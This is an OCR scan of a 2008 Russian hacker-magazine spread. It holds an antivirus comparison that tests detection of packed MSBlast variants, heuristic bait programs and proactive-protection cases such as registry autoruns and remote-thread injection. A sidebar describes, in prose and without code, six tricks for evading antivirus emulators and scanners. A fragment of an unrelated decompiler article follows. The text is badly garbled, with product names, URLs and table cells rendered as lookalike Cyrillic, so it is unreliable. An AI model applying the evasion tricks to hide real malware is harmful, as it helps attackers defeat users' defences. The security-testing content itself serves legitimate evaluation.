Вместе стем нужно отметить, что при выборе «дизайнерских» систем оп- 
ределяющими факторами могут стать дизайн и внешний вид. А здесь уже 
выбирать тебе, поскольку это весьма субъективные критерии, цц 
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КАКОЙ АНТИВИРУС 
ЛУЧШЁТ^^^И 



ТЕСТ-ДРАИВ АНТИВИРУСНЫХ ПАКЕТОВ 



Сколько бы мы ни писали о том, что любой антивирус можно обойти, сколько бы ни рас- 
сказывали, как без него обойтись, иметь при себе качественный сканер и антивирусный 
монитор в наше время условие почти обязательное. Но что выбрать? У каждого на этот 
счет свое мнение и даже внутри команды ] [ используются совершенно разные продукты. 
Мы решили положить конец спорам и, наконец, разобраться, каким продуктам можно 
довериться, а какие стоит незамедлительно отправить в отстой. Этот тест-драйв антиви- 
русов для тебя! 



самого начала работы над материалом встал очень важный 
вопрос: а как, собственно, проводить тестирование? Какой 
антивирус считать хорошим, а какой — плохим? Как вообще 
можно оценить эффективность работы, продуманность 
эвристических алгоритмов, результативность поиска? Интересно было по- 
смотреть, какс этой задачей справились другие, поэтому мы первым делом 
изучили уже имеющиеся тестирования, которые в небольшом количестве 
доступны в Сети. Все они строились примерно на одном принципе: бра- 
лась внушительная коллекция всевозможной заразы (20-30 тысяч вирусов, 
троянов и прочей малвари), рассортировывалась по категориям и на нее 
натравливались по очереди всетестируемые антивирусы. Эффективность 
антивируса втаком случае прямо пропорциональна количеству найденной 
малвари: чем больше нашел, тем лучше. Ознакомиться с результатами 
можно здесь: ѵѵѵѵм.апбѵігиз.ги/ОкпоА.ЬігпІ . ѵѵѵѵѵѵ.апіі-таіѵѵаге.ги . ѵѵѵѵѵѵ. 
ѵігиз.аг . Исследования эти довольно свежие, и повторять их не было ника- 
кого желания, да и смысла тоже, поэтому мы все сделали по-другому :). 



Количество найденный вирусов, как и объем самой базы, — показатель 
хоть и наглядный, но весьма косвенный. Намного интереснее посмот- 
реть, как антивирус справится ситуацией, когда перед ним вирус не 
в чистом виде (который, понятное дело, найти проще простого), а в 
закриптованном или упакованном варианте. Практика показывает, 
что в ход зачастую даже не обязательно пускать приватные крипторы 
— некоторые известные продукты валятся уже на самых простых и 
общеизвестныхупаковщиках. Воти проверим! 

Да и вообще, почему вирус обязательно должен быть в базе? Тупое 
сканирование подборки, включающей пускай даже редкие, но уже из- 
вестные вирусы, не учитываетэвристические возможности продуктов. 
А именно этим отличаются действительно продвинутые пакеты: суметь 
определить вирус по потенциально опасным участкам кода, собрать 
сигнатуры для них и грамотно обработать ситуацию (а не обзывать 
вирусами все подряд) — вот что действительно сложно. Поэтому для 
проверки эвристических алгоритмов мы провели отдельный тест, 




Тестирование 
проактивной защиты 


Подмена ехрюрев.ехе на 
любой другой исполня- 
емый файл 


Добавление нового ехе- 
файла в ветку РииОисЕ 


Добавляет новую йП, 

ВНЕДРЯЮЩУЮСЯ ВО ВСЕ 
ІІ5ЕР32-ПРИЛ0ЖЕНИЯ 


Внедрения малвари в чужое 
адресное пространство 
через Ѵіртііаі_Аі_і_осЕх 


Антивирус Касперского 7.0 


V 


V 


X 


V 


N0032 2.70.39 


X 


X 


X 


X 


аѵабт! 4 Ррореззіомаі. Еотои 


X 


X 


X 


X 


АѴѲ Амті-Ѵірцз Ррее Ейітіоы 7.5 


X 


X 


X 


X 


Аѵіпа АмтіѴір Рерзонаі-Еоітіом 7.06 


X 


X 


X 


X 


ВітОереыоер Амтіѵіргіз 2008 


X 


V 


X 


V 


Он. ѴѴев Антивирус 4.44 


X 


V 


X 


V 


Р-РРОТ Амтіѵівиз рорѴѴшооѵѵз 


X 


X 


X 


X 


Р-Зесцре Аиті-ѴіриБ 2008 


X 


X 


X 


X 


Монтой АмтіѴівиз 2008 


X 


X 


X 


X 


РамоаАмтіѵіро5 2008 


X 


X 


X 


X 


Борноз Мормаи ѴІРІІ5 Сомтроі. 


X 


X 


X 


V 


МсАрееѴірозЗсам 8.5.01 


X 


X 


X 


X 



► 026 



ХАКЕР 02 /110/ 08 









рс_гопе 




Аѵіга АпѣіѴі г — один из немногих достойных бес- 
платных антивирусов 




предварительно придумав простую, но показательную методику. 
Проактивная защита, которую сейчас активно вводят производители 
антивирусных пакетов, — это третий пункт нашей программы. 

Итак, все нашетестирование можно разделить на три части: 

1. Статическое сканирование. 

2. Эвристические алгоритмы. 

3. Проактивная защита. 

^ ПОДГОТОВКА КТЕСТИРОВАНИЮ 

Для тестирования мы взяли наиболее известные и продвинутые паке- 
ты, заслужившие доверие пользователей по всему миру. Брать другие 
продукты было бессмысленно, поскольку на фоне более продвинутых 
товарищей они смотрелись бы по меньшей мере жалко. Окончатель- 
ный списокантивирусных пакетов получился следующим: 

Антивирус Касперского 7.0 

N00322.70.39 

аѵаг*! 4 РгоТ'еггіопаІ Егііііоп 

АѴС Ап^і-Ѵігиг Ргее Егііііоп 7.5 

Аѵіга Ап+іѴіг РеггопаІЕсЖіоп Сіаггіс 7.06 

Ві^ЮеТеп^ег Ап*іѵігиг2008 

Ог.УеЬ Антивирус 4.44 



Р-РКОТ АпііѵігигТог Уіпгіоіѵг 
Р-Зесиге Ап+і— Ѵігиг 2008 
Иог+оп Ап+іѴігиг 2008 
Рапгіа Ап^іѵігиг 2008 
ЗорЬог Могтап Ѵігиг Соп^гоі 
МсАТ'ее ѴігигЗсап 8.5.0І 

Полная информация о каждом из них приведена в сводной таблице. 
Понятно, что устанавливать эти продукты вместе — полный бред. 
Каждый из них использует свои драйверы, прослойки для работы с 
ядром системы, песочницы и прочие приемы, которые несовместимы 
друг с другом. Поэтому для тестирования использовалась виртуальная 
машина ѴМѵѵаге. Общие характеристики стенда тестирования: 

ЫеІСогеС'ио 1,8 МГц 
2048 Мб 

Ѵіпгіоѵг ХР ЗР2 со всеми апдейтами 
ѴМѵагеб.О 

Для каждого антивируса был сделан свой снимок (зпарзбоі;), что позво- 
лило быстро переключаться между ними для тестирования. И первым в 
нашей программе был статический скан. 



Тестирование 

статических 

сканеров 


1. Нативный 

МБВЬАБТ 


2. М5-Ві_А5Т, 
упакованный 
А5Раск2.12 


3. М5-Ві_абт, 

РАСПАКОВАННЫЙ 


4. М5-Ві_А5Т, 
распакованный 

И ПЕРЕУПАКО- 
ВАННЫЙ АЗРаск 
2.12 


5. М5-Ві_абт, 6. М5-Ві_А5Т, 
РАСПАКОВАННЫЙ РАСПАКОВАННЫЙ 
ИЗАПРОТЕКЧЕН- И ПЕРЕУПАКО- 

ныйѴМРротест ванныйтЕюск 
1.22.2 0.98.2 


7. М5-Ві_абт, 

РАСПАКОВАН- 
НЫЙ И ПЕРЕ- 
УПАКОВАННЫЙ 

МісеРротест.2 


8. Программа, 

ОЧЕНЬ ПОХОЖАЯ 
НА ТРОЯН, НО 
ТАКОВЫМ НЕ 
ЯВЛЯЮЩАЯСЯ 


Антивирус Касперского 


V 


V 


V 


V 


V 


X 


V 


V 


7.0 


















N0032 2.70.39 


V 


V 


V 


V 


V 


V 


V 


V 


АѴА5ТІ 4 РРОРЕЗВЮНАІ. 


V 


V 


V 


V 


V 


X 


X 


X 


Еотом 


















АѴО Анті-ѴівеізРрее 


V 


V 


V 


V 


X 


X 


X 


X 


Еоітюы 7.5 


















АѵіраАмтіѴір 


V 


V 


V 


V 


V 


X 


V 


V 


РЕК5ОИАі.Еотом7.06 


















ВітОерешерАмтіѵіроз 


V 


V 


V 


V 


X 


X 


V 


V 


2008 


















Эк. ѴѴев Антивирус 4.44 


V 


V 


V 


V 


X 


X 


X 


V 


Р-РКОТ Аитіѵірив рок 


V 


V 


V 


V 


V 


X 


V 


V 


ѴѴішоѵѵв 






V 












Р-Зесцке Амті-Ѵіреіз 2008 


V 


V 


V 


V 


V 


X 


X 


V 


Моктои АнтіѴівиз 2008 


V 


V 


V 


V 


V 


X 


X 


V 


Раша Амтіѵіреі5 2008 


V 


V 


V 


V 


X 


X 


V 


X 


5орнозМорманѴіро5 


V 


V 




V 


V 


X 


V 


X 


СОИТНОІ. 






V 












МсАрееѴіро$5сам 8.5.01 


V 


V 


V 


V 


V 


X 


X 


X 
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В СТАТИЧЕСКИЙ СКАН 

Для проверки возможностей сканера, который является неотъемле- 
мой частью любого антивируса, какуже было сказано, мы не стали 
использовать тупое сканирование по базе малвари. Было интересно 
выяснить, какобрабатываеттот или иной продукт ситуацию, когда тело 
вируса запаковано или закриптовано с помощью специальныхутилит. 
Для этого мы сделали несколько заготовок и смотрели, что скажет 
каждый из антивирусов, обработав их. В качестве основы был выбран 
известнейший червь МЗВІазІ, с которым наверняка имела дело боль- 
шая часть читателей. Всего у нас получилось семь модификаций: 

1) тзЫаз^.ехе — тело вируса МЗВІазІ, поумолчаниюупакованное 
БРХ’ОМ; 

2) тзЫазІ-азраскесІ.ехе — МЗВІазІ, упакованный поверх БРХ’а с помо- 
щью АБРаск 2.12; 

3) тзЫазІ-сІеипрхесІ.ехе — МБВІазІ, распакованный; 

4) тзЫаз^-сІеипрхесІ-азраскесІ.ехе — МБВІазІ, распакованный и пере- 
упакованный АБРаск 2.1 2; 

5) тзЫазІ-сІеипрхесІ-ѵтргоіесІесІ.ехе — МЗВІазІ, распакованный и 



запротекченный ѴМРгоІесІ: 1 .22.2; 

6) тзЫазІ-сіеипрхесІ-ІеІоскесІ.ехе — МЗВІазІ, распакованный и переупа- 
кованный іЕІоск 0.98; 

7) тзЫазІ-сІеипрхесІ-пісергоІесІ: — МБВІазІ:, распакованный и запротек- 
ченный ЫісеРгоіесІ: 0.98. 

Вместе с различными модификациями МБВІазІ, анти вирусам также 
предлагался следующий файл, очень похожий на троян, нотаковым не 
являющийся: 

Ѳ) ѵізіЫе-сІѵѵпІсІг.ехе — тулза скачиваетдіі'-файл с помощью АРІ-функции 
ІІРІ_ОоѵѵпІоасІТоРі1.е и запускаетассоциированное с ним приложение 
через БЬеІІЕхесіЛе, что совершенно безобидно и вполне безопасно. 
Учитывая, что в куче приложений найдены ошибки парсинга графических 
файлов, открытие діГов, полученных из ненадежных источников, потен- 
циально ведет кзаражению, но вданном конкретном случае скачивае- 
мый приложением діі'абсолютно нормален. Воттолько антивирусам это 
не докажешь... 

Все эти файлы мы записали на болванку и тестировали отдельно на каж- 
дом антивирусном пакете, работая с различными зпарзбоЕами системы 



Тестирование 

эвристических 

алгоритмов 


01. Внедрение кода в 

КОНЕЦ КОДОВОЙ СЕКЦИИ; 

замена сашіА/іцМаіц на сан 
Мац/уавеМаш 


02. Передача управле- 
ния на МашареМаіи 

ОСУЩЕСТВЛЯЕТСЯ ЧЕРЕЗ 

САШВЕТ 


03. Программа тайно 

СКАЧИВАЮЩАЯ ФАЙЛ С ИН- 
ТЕРНЕТА (оОѴѴЫиЭАОЕР), 

НО ВПОЛНЕ БЕЗОБИДНЫЙ 


04. Тот ЖЕ ООШОАОЕК , но 
ПОЛУЧАЮЩИЙ УПРАВЛЕНИЕ 
ПОСРЕДСТВОМ СТРУКТУРНЫХ 
ИСКЛЮЧЕНИЙ 


Антивирус Касперского 7.0 


X 


X 


V 


V 


N0032 2.70.39 


X 


X 


V 


V 


АѴА5Т ! 4 РВОРЕЗЗІОНАІ. ЕйІТІОЫ 


X 


X 


X 


X 


АѴО Анті-Ѵівгіз Рвее Еоітіоы 7.5 


X 


X 


X 


X 


Аѵіва АитіѴір РевзонаіЕоітіом 7.06 


X 


X 


V 


V 


ВітОеремоевАмтіѵіішз2008 


X 


X 


V 


V 


Он. ѴѴев Антивирус 4.44 


X 


X 


V 


V 


Р-РРОТ Антіѵіішз рор ѴѴішоѵу5 


X 


X 


V 


V 


Р-5ЕсивЕАмті-Ѵівоз2008 


X 


X 


V 


X 


Мовтои АитіѴівоз 2008 


X 


X 


V 


X 


Раша Амтіѵівсіз 2008 


X 


X 


X 


X 


Зорноз Мормаи Ѵірцг Сонтвоі. 


X 


X 


X 


X 


МсАрееѴіво55сан8.5.0і 


X 


X 


X 


X 
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в ѴМѵѵаге. То, что у нас получилось, представлено в таблице 
«Тестирование статических сканеров». 

Результаты, честно говоря, нас немного удивили. Если с 
нахождением нативного МЭВІазІ: справились все (еще 
бы было иначе!], то с криптованными файлами возник- 
ли совершенно неожиданные проблемы. Исполнение 
защищенныхучастков кода на виртуальной машине в 
случае использования специального криптора ѴМРгоІесІ 
сильно осложнили анализ для некоторых антивирусов. 
Сканеры Аѵіга АпбѴіг РегзопаІЕсІібоп, ВіШе^епсІег Апбѵігиз 
2008, популярнейший на Западе Рапба Апбѵігив и в России 
— Ог.ѴѴеЬ Антивирус не смогли распознать в исследуемом 
файле малварь. Еще хуже дела обстоятс морфером {Еіоск. 
Несмотря на то что мы использовали публичный билд, уже 
давным-давно распространяющийся в Сети, полиморфный 
движок до сих пор не по зубам большинству антивирусов. 
Лишьтолько N0032 смогувидеть в тестируемом экземп- 
ляре потенциально опасный файл. Последним криптором, 
который использовался для создания тестовых файлов, был 
ЫісеРгоІесС разработанный нашим автором СРсН и ска- 
чанный с официального сайта ѵѵѵѵѵѵ.пісергоіесі.согп . Аѵазі. 
АѴС, Ог.ѴѴеЬ, Р-5есиге, Ыогіоп, МсА^ее с ним, к сожалению, 
оказались незнакомы! 

Ачто с программой, очень похожей на вирус?Тут50 на 50: 
одна половина антивирусов указала на то, что это потен- 
циально опасный код, другая просканировала файл без 
какой-либо реакции. Что лучше? Сложный вопрос: с одной 
стороны, ложное срабатывание всегда бесит и вводит в 
заблуждение пользователей. С другой стороны, это ведь 
действительно могбыть какой-нибудьопасный загрузчик, 
и тогда отчет анти в и руса о потенциальной угрозе был бы 
очень кстати! 

Итоги: среди всех пакетов заметно выделяется N0032, 
который обнаружил заразу во всех предложенных нами 
файлах, за что и получает премию «Лучший статический 
сканер». Чуть хуже показали себя Антивирус Касперского 
и ЭорЬоз, пропустив файл, закриптованный іЕІоск. Все 
остальные пакеты находятся примерно на одном уровне, 
явных аутсайдеров сегодня нет. 

^ ЭВРИСТИЧЕСКИЙ АНАЛИЗ 

Новые вирусы и их всевозможные модификации появля- 
ются каждый день. Антивирусные компании, несмотря на 
все свои ухищрения, не могут моментально реагировать 



на появление мал вари, поэтому проходит порядочное 
время, прежде чем тело вируса будет проанализировано 
и соответствующие сигнатуры добавлены в базу данных. 
Именно поэтому в любом сканере помимо сигнатурного 
поиска предусмотрен более сложный — эвристический. В 
процессе эвристического анализа проверяется структура 
файла, его соответствие вирусным шаблонам, выявля- 
ются конструкции, характерные для червей, вирусов и 
прочей малвари. В результате становится возможным 
обнаружение еще неизвестной малвари. Эта техноло- 
гия неспособна на 1 00% определить, вирус перед ней 
или нет, и, каклюбой вероятностный алгоритм, грешит 
ложными срабатываниями. Мы подготовили несколько 
программ, которые не являются вирусами, но используют 
характерные для них приемы. Посмотрим, как отреагиру- 
ют на них антивирусы. Всего у нас девять заготовок: 

1) поіерасі- 1 .ехе — в конец кодовой секции внедрен код, 
передача управления осуществляется не коррекцией 
точки входа (как делает большая часть малвари), а заме- 
ной са [1 ѴѴіпМаіп са II МаІѵѵагеМаіп; 

2) позера б -2. ехе —то же самое, что и в предыдущем при- 
мере, но на этот раз передача управления на МаІѵѵагеМаіп 
осуществляется через сладкую парочку САІ_І_/РЕТ ; 

3) іпѵівіЫе-бѵѵІбг.ехе — программа, тайно скачивающая 
файл из интернета (в данном случае дб-файл] и запуска- 
ющая ассоциированное с ним приложение; 

4) іпѵІБІЫе-бѵѵІбг-зеЬ.ехе — такой же боѵѵпіоабег, как и 
предыдущий, но получающий управление посредством 
структурных исключений, которые не все антивирусы 
умеют эмулировать; 

5) іпѵівіЫе-бѵѵІбг-ІопдІоор.ехе — такой же боѵѵпіоабег, 
как и предыдущий, но перед получением управления 
мотающий очень долгий цикл; эвристики умирают, не 
доходя до его конца; 

6) гпБЫаБІ:-беипрхеб-а5раскеб-5еЬ.ехе — вирус МЗВІазІ, 
в котором передача управления осуществляется через 
структурные исключения; 

7) гпБЫаБ^-беипрхеб-аБраскеб-ІопдІоор.ехе — вточку 
входа тела МЭВІазІ внедрен очень длинный цикл; эму- 
лятор успевает отключиться, прежде чем реальный код 
получит управление; 

8) ѵІ5ІЫе-бѵѵпІбг-5еЬ.ехе — уже известный нам 
боѵѵпіоабег, только получающий управление через струк- 
турные исключения; 




> СІѴСІ 

В этот раз на нашем 
ОѴО-приложении 
мы подготовили для 
тебя большую под- 
борку антивирусных 
пакетов. 



05. Тот ЖЕ ООѴѴЫШАОЕК, но 

ПЕРЕД ПОЛУЧЕНИЕМ УПРАВЛЕНИЯ 
МОТАЮЩИЙ ОЧЕНЬ ДОЛГИЙ ЦИКЛ. 

Эвристики мрут, не доходя до 

ЕГО КОНЦА 


06. Вирус М5Ві_абт: 

ПЕРЕДАЧА УПРАВЛЕНИЯ 
ЧЕРЕЗ СТРУКТУРНЫЕ 
ИСКЛЮЧЕНИЯ 


07. Вирус МЗВьазт: 

В ТОЧКУ ВХОДА ВНЕДРЕН ОЧЕНЬ 
ДЛИННЫЙ ЦИКЛ 


08. Программа, открыто 

СКАЧИВАЮЩАЯ ФАЙЛ ИЗ 
ИНТЕРНЕТА; УПРАВЛЕНИЕ 
ЧЕРЕЗ СТРУКТУРНЫЕ 
ИСКЛЮЧЕНИЯ 


09. ТДЖЕ ПРОГРАММА; 
В ТОЧКУ ВХОДА ВНЕДРЕН 
ОЧЕНЬДЛИННЫЙЦИКЛ 
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9)ѵізіЫе-сІѵѵпІс1г-ІопдІоор.ехе — известный нам сіоѵѵпіоасіег, в начале 
которого стоит длинный цикл; за время его исполнения антивирусы 
теряют к нему всякий интерес. 

Перед сканированием в настройках каждой программы включался 
самый глубокий уровень анализа и расширенная эвристика, если 
таковая была предложена разработчиками. Результаты тестирования 
представлены втаблице «Тестирование эвристических алгоритмов». 
Два первых наших файла показались антивирусам абсолютно без- 
обидными даже несмотря на то, что в них применяются характерные 
для вирусов приемы. Надо сказать, что в целях эксперимента я залил 
эти файлы на ѵѵѵѵѵѵ.ѵігивіоіаі.сот — специальный сервис, предназна- 
ченный для проверки файлов по базам многочисленных антивиру- 
сов. Так вот некоторые продукты (малоизвестные и поэтому в нашем 
тестировании участия не принимающие) все-таки смогли задетектить 
в поіерасі-і .ехе и поІерасі-2.ехе потенциальную малварь. Но будем 
считать, что наши пакеты — более продвинутые и могут отличить обыч- 
ный (пусть и модифицированный) блокнот от мал вари :). С выявлением 
опасного кода в других файлах антивирусы справились на порядок 
лучше. Единственное, расстраивает, что чуть измененный МЭВІазІ смог 
облапошить сразу три антивируса, для этого всего-то нужно было поста- 
вить в точку входа оченьдлинный цикл. 

Итоги: из таблицы видно, что наибольшее количество опасного кода 



обнаружено сразу тремя пакетами: Аѵіга АпбѴіг, Эг.ѴѴеЬ Антивирус, Р-Ргоі 
Апбѵігиз, за что они получают нашу награду «Лучшая эвристика». Неплохо 
показали себя Антивирус Касперского и ВіШеІепсІег, остальные пакеты в 
предложенных образцах никакихугроз не обнаружили. 

г ПРОАКТИВНАЯ ЗАЩИТА 

Что вообще такое «проактивная защита»? Эта технология — логическое 
продолжение эвристических методов детектирования вредоносного ПО 
путем анализа его возможной деятельности. Однако «проактивная защи- 
та» — более широкое понятие, нежели «эвристический анализатор». Оно 
включает в себя мониторингсистемного реестра, контроль целостности 
критических файлов, мониторинг работы приложений с оперативной 
памятью и другие методы. Когда сигнатурный и эвристический поиск не 
дают результатов, предотвратить работу неизвестной малвари бывает под 
силу как раз такой проактивной защите. Для того чтобы посмотреть на ее 
работу на практике, были разработаны следующие заготовки: 

1. ехрІогег.ЬаІ — подменяет ехріогег.ехе (активный процесс, защищенный 
отзаписи!) на стсі.ехе (или любой вирус по вкусу). Действия вступают в 
силу после перезагрузки или убиения ехріогег’а любыми средствами. 

2. гипопе.ЬаІ: — добавляетновыйехевПипОпсе.Требуетправадминистратора. 

3. ѵѵтІІюЙіх.ЬаІ — добавляет новую ОІ_І_, проецирующуюся на все вновь 
запускаемые ІІ5ЕВ32-приложения (то есть приложения с графическим 



Как обманывают 
антивирус 

Трюк 1 : технология чистого листа 

Малварь, написанная с нуля ({тот ійе зсгаІсЬ), не поддается детектирова- 
нию в принципе (если, конечно, она не использует готовых компонентов, 
свистнутых из других вирусов, уже успевших засветиться в антивирусных 
базах) . Теоретически существуют определенные последовательности 
машинных инструкций/АРІ-функций, характерных для малвари и прак- 
тически не встречающихся в честных программах, по которым эвристи- 
ческий анализатор может определить угрозу при условии, что антивирус 
получает управление первым, что вовсе не факт! 

Зловредные последовательности легко зашифровать, разнести по разным 
частям программы, разбавить мусором, в результате чего практически все 
эвристики остаются не удел. Самые продвинутые (КАѴ, N0032) упорно 
продолжают мочить заразу, поэтому хакерам приходится прибегать к 
другим трюкам. Но! Это в случае, если антивирус получает управление 
первым, например, если пользователь открывает исполняемый файл, 
проверяемый антивирусом перед запуском. А если малварь проникает 
через дыру в сетевом стеке (например), то она (при наличии достаточ- 
ных прав) запросто прикончит антивирус, и тот никак не сможет ей 
противостоять. 

Трюк 2: упаковщики и протекторы 

Антивирусы поддерживают обширную (и постоянно обновляемую) базу 
упаковщиков исполняемых файлов и прочих протекторов, разработчи- 
ки которых прилагают титанические усилия, чтобы сделать упаковку 
однонаправленным процессом, то есть, чтобы максимально затруднить 
распаковку. Разгрызть навороченный протектор очень сложно, и на это 
уходит от пары дней до нескольких недель рабочего времени, в течение 
которого любой древний вирус, обработанный новым протектором, будет 
проходить сквозь антивирусные заслоны со свистом пули. Как вариант 
— можно слегка подправить код уже существующего протектора, и анти- 
вирус вновь обломается с его распаковкой. 

Трюк 3: оставаться в памяти 

Проактивные механизмы концентрируются вокруг исполняемых файлов, 
реестра и прочих ресурсов, в которых гнездится зараза, откладывая яйца. 
Однако существует множество червей, обитающих исключительно в 



памяти и не прикасающихся ни к диску, ни к реестру. Естественно, такие 
черви гибнут при перезагрузке, однако если компьютер подключен к 
сети, то червь будет приходить вновь и вновь, пока администратор не 
заткнет все дыры. Лишь некоторые антивирусы периодически выполняют 
сканирование памяти! 

Трюк 4: код, который модифицирует севя сам 

Даже у самых продвинутых АѴ- движков эмуляторы не поддерживают са- 
момодифицирующийся код, что позволяет малвари установить команду 
перехода на честный код и тут же изменить целевой адрес на вирусное 
тело, но антивирусы этого не заметят и будут искать черную кошку, кото- 
рой нет, в темной комнате, которая никогда не существовала. Естествен- 
но, некоторые тривиальные самомодификации изначально заложены в 
эвристический движок и палятся налету, но в общем случае самомодифи- 
цирующийся код современным антивирусам все еще не по зубам. 

Трюк 5: использование неизвестных команд 

При заражении программы вирус обычно внедряет в точку входа честной 
программы одну или несколько команд для передачи управления на 
вирусное тело, которое может быть расположено где угодно: в начале, 
середине, конце файла, или даже «размазано» по всей его длине. Если 
эти команды неизвестны эмулятору ЦП, то антивирус просто пропускает 
такой файл, поскольку знает, с какого адреса продолжать декодирование 
(неизвестные машинные команды имеют неизвестную длину), а неиз- 
вестных команд очень много. Реально эмуляторы поддерживают только 
базовые инструкции, не более 10% от общего набора х86-команд. Что же 
касается х86-64, то это вообще шах и мат (во всяком случае сейчас) . 

Трюк 6: использование АРІ-функций 

Эмуляторы, встроенные в антивирусы, эмулируют лишь машинные 
инструкции (да и то не все), но не АРІ-функции операционной системы, 
результат которых можно использовать для расшифровки кода. Самый 
распространенный трюк среди хакеров — берем некоторую АРІ-фун- 
кцию, передаем ей некорректные параметры, чтобы она возвратила 
определенный код ошибки (заранее известный хакеру), использующийся 
для расшифровки основного вирусного тела. Антивирусы нервно курят в 
сторонке, но в драку не лезут, поскольку эмулировать все АРІ-функции — 
задача практически нерешаемая, а если же использовать динамическую 
эмуляцию (то есть выполнять АРІ-функции на живом ЦП), то при этом 
существует риск, что вирус вырвется за пределы эмулятора и захватит 
управление. 



► озо 
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Итоги: награду «Лучший про- 
актив» заслуженно получает 
Антивирус Касперского — эта 
штука действительно работает и 
может предотвратить деятель- 
ность всевозможной заразы. 
Порадовала также песочница 
БорЬоз Ыогтап’а, которую 
вирусам обойти будет довольно 
сложно. 




і-ѵ з 





Старый добрый Ыогіоп Апбѵігиз 

интерфейсом), перезагрузки не требует, но требует прав администратора. 
4. ѵа_іЬгеасі.ехе — демонстрирует излюбленный способ внедрения мал- 
вари в чужое адресное пространство с помощью создания удаленного 
потока, выполняющегося в области памяти, выделенной АРІ-функцией 
ѴИиаІАІІосЕх. 

Надо сказать, что методы проактивной защиты пока мало распростране- 
ны. Это относительно новая технология, поэтому нет ничего удивитель- 
ного втом, что многие антивирусы не отрабатывают эти ситуации. Это не 
значит, что они плохие, просто они этого пока не умеют. 



г подводя итоги 

Так какой же антивирус лучше? 
Никакой! Практика показы- 
вает, что в разных ситуациях 
каждый из продуктов ведет себе 
по-разному. Где-то лучше N0032, 
где-то эффективнее оказываются технологии Антивируса Каспер- 
ского, а в третьей ситуации их обоих переплюнет какой-нибудь 
другой продукт. К сожалению, установить несколько антивирусных 
пакетов нельзя, да и это не гарантировало бы полной защиты. 
Гораздо важнее выполнять элементарные правила безопасности, 
чтобы у заразы не было ни малейшего шанса попасть в систему. 
Впрочем, в наше время иметь при себе антивирусный пакет необ- 
ходимо. Итеперьты можешь выбрать его, исходя ихтого, что для тебя 
важнее, цц 
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КРИС КАСПЕРСКИ/ 



НЕХРАѴ5=^^^И 

ДЕКОМПИЛЯТОР^ 
НОВОГО ПОКОЛЕНИЯ 

ПРЕВРАЩАЕМ ЛЮБОЙ БИНАРНИК ВС-КОД 



Начинающие реверсеры, еще не познавшие все прелести чистого ассемблера, постоянно 
спрашивают на хакерских форумах, где бы им раздобыть декомпилятор для Си или Пас- 
каля. Декомпиляторов-то много, но вот результат... без дизассемблера все равно ну никак 
не обойтись. И вот, наконец, свершилось! Ильфак (автор легендарного дизассемблера ЮА 
Рго) выпустил декомпилятор нового поколения НехКауз, делающий то, что другим не под 
силу. Мир вздрогнул от восторга (реклама вообще обещала чудо), порождая сейсмичес- 
кие волны впечатлений: от оргазма до полного отвращения. Истина же, как водится, где- 
то посередине, и стоит обозначить эту середину, рассмотрев слабые и сильные стороны 
декомпилятора, а также области его применения. 



очемуу Ильфака получилосьто, что упорно не желало полу- 
чаться у других? Начнем стого, что НехНау представляет собой 
всего лишь плагин к ЮА Рго — интерактивному дизассемблеру 
более чем с десятилетней историей, первая версия которой 
увидела свет 6 мая 1991 года. Спустя некоторое время к работе над ней под- 
ключился удивительный человек, гениальный программисти необычайно 
креативный кодер Юрий Харон. Вместе с Ильфаком (не без помощи других 
талантливых парней, конечно) они начали работать втом направлении, 
куда еще никто не вкладывал деньги. До этого дизассемблеры писались 
исключительно на пионерском энтузиазме параллельно с изучением 
ассемблера и довольно быстро забрасывались. Ильфак и Юрий Харон 
решили рискнуть. В итоге ЮА Рго стал нетолько основным, но и, пожалуй, 
единственным продуктом фирмы ВаІаРевсие (мелкие утилиты и прочие 
ответвления не в счет). Стоитли удивляться, что парням удалось решить 
практически все фундаментальные проблемы дизассемблирования, над 
которыми просто не хотели работать остальные разработчики, зная, что 
быстрой отдачи не будет и проект потребует десятилетий упорного труда. 
Самое время выяснить, что же это за проблемы такие, откуда они берутся и 
как решаются. 

^ ФУНДАМЕНТАЛЬНЫЕ ПРОБЛЕМЫ ДЕКОМПИЛЯЦИИ 

Компиляция — процесс однонаправленный и необратимый, в ходе кото- 
рого теряется огромное количество лишней информации, совершенно 
ненужной процессору. Это не шутка! Исходный текст, написанный на языке 
высокого уровня, чрезвычайно избыточен, что, с одной стороны, упрощает 



его понимание, а с другой — страхует программиста от ошибок. Взять хотя 
бы информацию отипах. На низкомуровне процессор оперирует базовыми 
типами: байт, слово, двойное слово. Строки превращаются в последова- 
тельности байтов, и, чтобы догадаться, что это строка, приходится прибе- 
гать к эвристическим алгоритмам. 

Структуры и классы также «расщепляются» входе компиляции, и, за ис- 
ключением некоторых виртуальных функций, все остальные члены класса 
теряют свою кастовую принадлежность, становясь глобальными проце- 
дурами. Восстановить иерархию классов в общем случае невозможно, а в 
принципе не сильно и нужно. 

Никто из здравомыслящих людей не требует от декомпилятора получения 
даже приближенной копии исходного кода, но мы вправе рассчитывать 
на удобочитаемость листинга, а также на то, что повторная компиляция не 
развалит программу, а создаст вполне работоспособный модуль — тогда мы 
сможем вноситьлюбые изменения в декомпилированныйтекст, развивая 
его в нужном нам направлении. В противном случае та кому декомпилятору 
место на свалке, и фиксить баги декомпиляции ничуть не проще, чем пере- 
писывать подопытную программу с нуля. Декомпиляции препятствует ряд 
серьезных проблем, важнейшие из которых перечислены ниже. 

г ЧТОВИМЕНИТВОЕМ 

Комментарии, имена функций и переменных в процессе компиляциите- 
ряются безвозвратно (исключение составляютдинамическиетипы, имена 
которых в двоичном модуле хранятся как есть, а потому и тормозят, словно 
динозавры). Ну, комментариев в большинстве исходных текстов итак 




► 032 



ХАКЕР 02 /110/ 08 






рс_гопе 



негусто, так что их отсутствие еще можно пережить, но вот без 
имен переменных и функций логика работы даже простейших 
программ становится совершенно непонятной. 

Ксчастью, современные программы наполовину (а то и более] 
состоят из библиотечных и АРІ-функций, которые распозна- 
ются классическим сигнатурным поиском. Главное — собрать 
обширную базу библиотек всех популярных (и непопулярных] 
компиляторов с учетом многообразия их версий. 

ЮАРго уже давно поддерживаеттехнологию РІ_ІРТ(Ра5І: 
ЫЬгагу Иепббсабоп апб Ресодпібоп Тесбпоіоду), нетолько 
распознающую библиотечные функции, но также восстанав- 
ливающую их прототипы вместе с прототипами АРІ-функций, 
которые, кстати говоря, могут импортироваться не только 
по имени, но еще и по ординалу, то есть по номеру. Чтобы 
превратить бессловесный номер в имя, понятное человеку, 
опять-таки требуется база. 

Почему реконструкция прототипов так важна для декомпи- 
лятора? А потому, что она позволяет восстанавливать типы 
передаваемыхфункциями переменных, назначая им хоть и 
обезличенные, но всеже осмысленные имена в стиле: бѴѴпсІ, 
